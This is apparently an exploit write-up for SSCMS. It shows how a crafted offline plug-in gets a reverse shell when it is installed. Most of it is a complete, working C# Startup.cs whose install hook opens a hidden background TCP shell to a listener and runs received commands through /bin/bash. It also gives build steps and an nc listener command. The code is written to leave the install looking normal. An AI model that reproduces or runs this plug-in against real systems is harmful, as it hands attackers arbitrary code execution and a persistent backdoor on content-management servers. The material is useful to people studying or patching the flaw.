
Vulnerable Function

Plug-in offline installation function: a reverse shell is obtained by crafting a malicious plug-in. Because the host loads and executes the uploaded plug-in assembly while installing it, anyone who can reach the offline plug-in upload (normally an administrative account, so this is post-authentication) can run arbitrary code with the privileges of the SSCMS process.

(screenshot)

Building the Plug-in

git clone https://github.com/Richard-Tang/SSCMS-PluginShell.git

Change the IP address (and, if necessary, the port) in the `Startup.cs` file so that it points at your listener, then compile the project with Visual Studio.

(screenshot)

(screenshot)

Compress the build output into the archive format that the offline plug-in installer accepts.

(screenshot)

Getting the Shell

nc -lvvp 8889

(screenshot)

Upload the plug-in through the offline installation page; the payload runs at the moment the plug-in is installed, not when it is first used.

(screenshot)

The reverse shell connects back to the listener. It runs with the privileges of the SSCMS host process, so the effective user depends on how the CMS is deployed (service account, container, etc.).

(screenshot)

Root Cause

You only need to write code that conforms to the plug-in format and place the payload in a method the host invokes when the plug-in is installed — here `IPluginConfigureServices.ConfigureServices` — so that simply installing the plug-in triggers the exploit code.

using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;

namespace SSCMS.Advertisement
{
    // Skeleton of the malicious plug-in. SSCMS resolves this type and calls
    // ConfigureServices while installing the plug-in (see "Principle" above),
    // so whatever is placed there executes inside the CMS host process.
    public class Startup : IPluginConfigureServices
    {
        // Invoked by the host during installation; the payload goes here so
        // it fires as soon as the plug-in is installed.
        public void ConfigureServices(IServiceCollection services)
        {
            ... <--- ExploitCode
            
            // Presumably the registration the genuine Advertisement plug-in
            // performs; kept so the plug-in still installs like a normal one.
            services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
        }
	}
}

Exploit (complete `Startup.cs`)

using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;

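namespace SSCMS.Advertisement
{
    /// <summary>
    /// Malicious plug-in entry point. SSCMS invokes <see cref="ConfigureServices"/>
    /// while installing the plug-in, so everything started from here runs inside
    /// the CMS host process with that process's privileges. This proof of concept
    /// uses the hook to open a TCP reverse shell to the listener started with
    /// <c>nc -lvvp 8889</c>. For authorised testing only.
    /// </summary>
    public class Startup : IPluginConfigureServices
    {
        /// <summary>Address of the listener; change this before compiling (see the README).</summary>
        private const string ListenerHost = "172.17.0.1";

        /// <summary>Port of the listener; must match the <c>nc -lvvp</c> port.</summary>
        private const int ListenerPort = 8889;

        /// <summary>Size of the receive buffer for a single command.</summary>
        private const int ReceiveBufferSize = 1024 * 5;

        /// <summary>
        /// Called by the plug-in host during installation. Starts the reverse shell
        /// on its own thread so this method returns promptly and the install looks
        /// normal, then performs the registration the Advertisement plug-in
        /// presumably does anyway.
        /// </summary>
        /// <param name="services">The host's service collection.</param>
        public void ConfigureServices(IServiceCollection services)
        {
            // Background thread: the shell must not keep the host alive on
            // shutdown, and nothing thrown on it may reach the host (see reversShell).
            Thread shellThread = new Thread(reversShell) { IsBackground = true };
            shellThread.Start();

            services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
        }

        /// <summary>
        /// Connects to the listener and, until the peer hangs up, treats each
        /// received chunk as one shell command and sends its output back.
        /// Limitation kept from the original: TCP is a stream, so a command split
        /// across two reads (or two commands arriving in one) is executed as received.
        /// </summary>
        public void reversShell()
        {
            Socket socketshell = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            try
            {
                socketshell.Connect(new IPEndPoint(IPAddress.Parse(ListenerHost), ListenerPort));

                byte[] getdata = new byte[ReceiveBufferSize];
                while (true)
                {
                    int n = socketshell.Receive(getdata);
                    if (n == 0)
                    {
                        // Peer closed the connection. The original looped here
                        // forever, spawning one bash per iteration for an empty command.
                        break;
                    }

                    // UTF-8 explicitly: Encoding.Default is UTF-8 on .NET Core but
                    // the ANSI code page on .NET Framework.
                    string command = Encoding.UTF8.GetString(getdata, 0, n);
                    byte[] senddata = Encoding.UTF8.GetBytes(willshell(command));
                    if (senddata.Length > 0)
                    {
                        socketshell.Send(senddata);
                    }
                }
            }
            catch (Exception)
            {
                // Deliberately swallowed: an unhandled exception on this thread
                // would terminate the whole CMS host process.
            }
            finally
            {
                socketshell.Close();
            }
        }

        /// <summary>
        /// Runs one command line through <c>/bin/bash</c> and returns what it wrote
        /// to stdout followed by what it wrote to stderr. A fresh bash is started
        /// per call, so the working directory and variables do not persist
        /// between commands.
        /// </summary>
        /// <param name="command">Command text; written to bash's stdin as one line.</param>
        /// <returns>Combined stdout and stderr of the command (may be empty).</returns>
        public static string willshell(object command)
        {
            using (Process process = new Process())
            {
                process.StartInfo.FileName = "/bin/bash";
                process.StartInfo.UseShellExecute = false;
                process.StartInfo.RedirectStandardInput = true;
                process.StartInfo.RedirectStandardOutput = true;
                process.StartInfo.RedirectStandardError = true;
                process.StartInfo.CreateNoWindow = true;
                process.Start();

                // Drain stderr concurrently: the original redirected stderr but never
                // read it, which loses error output and deadlocks ReadToEnd() on stdout
                // once the stderr pipe fills.
                var stderrTask = process.StandardError.ReadToEndAsync();

                // The original first sent "echo off" (a cmd.exe habit); under bash
                // that prints the word "off" ahead of every result, so it is dropped.
                process.StandardInput.WriteLine(command);
                process.StandardInput.WriteLine("exit");
                // Close stdin so bash sees EOF even when "exit" never executes
                // (e.g. the command left a quote open and bash is still reading it).
                process.StandardInput.Close();

                string stdout = process.StandardOutput.ReadToEnd();
                string stderr = stderrTask.Result;
                process.WaitForExit();
                return stdout + stderr;
            }
        }
    }
}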